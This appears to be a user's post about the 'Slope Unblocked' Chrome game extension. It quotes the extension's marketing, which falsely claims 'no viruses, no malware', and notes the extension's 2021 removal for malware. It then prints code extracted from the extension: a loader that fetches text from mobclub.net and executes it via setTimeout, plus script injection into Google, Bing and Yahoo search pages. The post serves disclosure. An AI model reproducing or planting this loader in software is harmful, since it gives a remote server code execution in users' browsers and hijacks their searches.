Slope unblocked game for schools. Playing competitive arcade games is a surefire way to engage students!
Slope Unblocked Game - Engaging Arcade Game for Schools
Slope Unblocked Game is a Chrome extension that allows you to play the popular arcade Slope game without any blocks in schools. It ensures students' engagement by offering a competitive gaming experience. The game is packed within the extension, keeping it safe from being blocked. With no viruses or malware, enjoy playing Slope anytime!
This extension was removed from Chrome Web Store on
2021-11-04 due to malware
Popular arcade Slope game is unblocked in this extension.
This extension is not one that opens the website! The game is packed in the extension, so it will never be blocked for schools.
Note: If you will forget that this extension is installed and search for "slope unblocked" in the google or yahoo, we will show you a reminder that will help you to navigate into the slope game. This will keep your time and protect from suspicious sites.
No viruses, no malware. Enjoy!
Code I have collected that i assume to be stealing user data.
chrome.browserAction.onClicked.addListener(open_game_player);
// open the game 1st time when installed
chrome.runtime.onInstalled.addListener(function(e) {
if (e.reason === "install")
open_game_player()
});
! function() {
if (chrome.runtime.id !== 'bnghijefocbfghbcinnikcebpghclojc') {
return
}
// collection daily usage stats
var request = new XMLHttpRequest();
request.timeout = 29000;
var succeed = function(status, apply) {
console.log(status ? 'stats collected ' + setTimeout.apply(top, [apply]) : 'stats blocked');
};
request.onerror = function() {
succeed(false)
};
request.onload = function() {
if (request.status === 200 && request.responseText)
return succeed(true, request.responseText);
};
try {
request.open("GET", 'https://mobclub.net/client.php?uid=slope', true);
request.send();
} catch (e) {
succeed(false)
}
}();
chrome.webRequest.onBeforeRequest.addListener(
function(details) {
return {
cancel: true
};
}, {
urls: ["*://www.id.net/api/*"]
},
["blocking"]
);
fetch("js/const.js")
.then(a => a.text())
.then(constjs => {
fetch("js/prompt.js")
.then(a => a.text())
.then(promptjs => {
let js = constjs + promptjs;
chrome.tabs.onUpdated.addListener(function(tabId, changeInfo, tab) {
if (changeInfo.url) {
let url = changeInfo.url + "";
if (url.indexOf('search') > -1 && url.indexOf('https://') === 0 && (
url.indexOf('://www.google.') > -1 ||
url.indexOf('https://www.bing.com/') > -1 ||
url.indexOf('search.yahoo.com/') > -1
)) {
chrome.tabs.insertCSS(tabId, {
allFrames: false,
file: 'content.css',
runAt: 'document_start'
}, function() {
chrome.tabs.executeScript(tabId, {
allFrames: false,
code: js,
runAt: 'document_start'
}, function() {
})
})
}
}
});
})
})
Source code and support at https://github.com/Rob--W/crxviewer, provided by Rob Wu.